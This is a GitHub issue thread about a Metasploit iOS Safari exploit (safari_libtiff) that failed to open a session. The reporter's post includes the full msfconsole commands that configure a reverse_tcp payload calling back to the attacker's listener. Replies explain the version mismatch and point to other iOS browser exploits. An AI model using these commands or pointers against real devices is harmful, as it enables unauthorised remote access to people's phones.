Metasploit-framework: ios exploit safari_libtiff... link does not open in safari browser. session is not created
Steps to reproduce
i have been using "exploit/apple_ios/browser/safari_libtiff"
and payload "osx/armle/execute/reverse_tcp"
I have been using my internal ip... I tried to use ngorok external ip once, then the link was successfully opened and the session was created, but the handler could not connect , and the session was also immediately closed with an error.
This is what i have been doing
msf > use exploit/apple_ios/browser/safari_libtiff
msf exploit(safari_libtiff) > set URIPATH /ipwn
URIPATH => /ipwn
msf exploit(safari_libtiff) > set PAYLOAD osx/armle/execute/reverse_tcp
PAYLOAD => osx/armle/execute/reverse_tcp
msf exploit(safari_libtiff) > set LHOST xxx.xxx.x.xxx
LHOST => xxx.xxx.x.xxx
msf exploit(safari_libtiff) > set LPORT 4444
LPORT => 4444
msf exploit(safari_libtiff) > exploit
[] Started reverse handler
[] Using URL: http://0.0.0.0:8080/ipwn
[] Local IP: http://xxxx.xxx.x.xxx:8080/ipwn
[] Server started.
[*] Exploit running as background job.
msf exploit(safari_libtiff) >
Expected behavior
when the URL is opened in the safari browser, it should create a session that i can interact with.
Current behavior
What happens instead is that the link can not be opened in the safari browser in my iphone and the session is therefore not created
System stuff
Metasploit version 4.16.42 -dev
OS
Kali Linux
hamza7malik
All 6 comments
Which device are you testing with? This is exploit is for iOS 1.1.1 (which is very old!).
Do you see [*] xxx.xxx.x.xxx safari_libtiff - Sending exploit in the output? If not, it sounds like a networking issue.
timwr
on 12 Mar 2018
@timwr Thankyou. I've been testing it on ios 7.1.2 :( . it does show sending exploit
hamza7malik
on 12 Mar 2018
The exploit you're testing with is for iOS 1.1.1, so it will not work on 7.1.2.
I have an iPhone 4 on 7.1.2 but I'm yet to find a Safari exploit that works. Which model do you have?
There is https://github.com/feliam/CVE-2014-4377/blob/master/mkCrash.py by @feliam
In theory this exploit: https://github.com/rapid7/metasploit-framework/pull/9528 might work also (it's for < 9.3.5) but it's not working currently.
https://jailbreak.me/, is using the same exploit but it's only for 32bit 9.1 - 9.3.4 and I can't find a vulnerable device.
@tihmstar also has a nice blog about it here: http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html
Any suggestions would be much appreciated.
timwr
on 12 Mar 2018
Please, tell me! How it is possible? I have a iPhone 4s and also an iPad 2 . Till this moment I can not get any vulnerability
bennylangston
on 12 Sep 2018
Does it work with jailbroken ios 13.4? If not what does work with it?
hokd2905
on 7 Jun 2020
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It鈥檚 been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
![github-actions[bot] picture](https://avatars2.githubusercontent.com/in/15368?v=4&s=40)
github-actions[bot]
on 2 Dec 2020
Related issues
Rogdham
路
47Comments
monomaki2035
路
31Comments
nixawk
路
39Comments
apollyonfirstcome
路
42Comments
akefallonitis
路
28Comments
Most helpful comment
Which device are you testing with? This is exploit is for iOS 1.1.1 (which is very old!).
Do you see
[*] xxx.xxx.x.xxx safari_libtiff - Sending exploitin the output? If not, it sounds like a networking issue.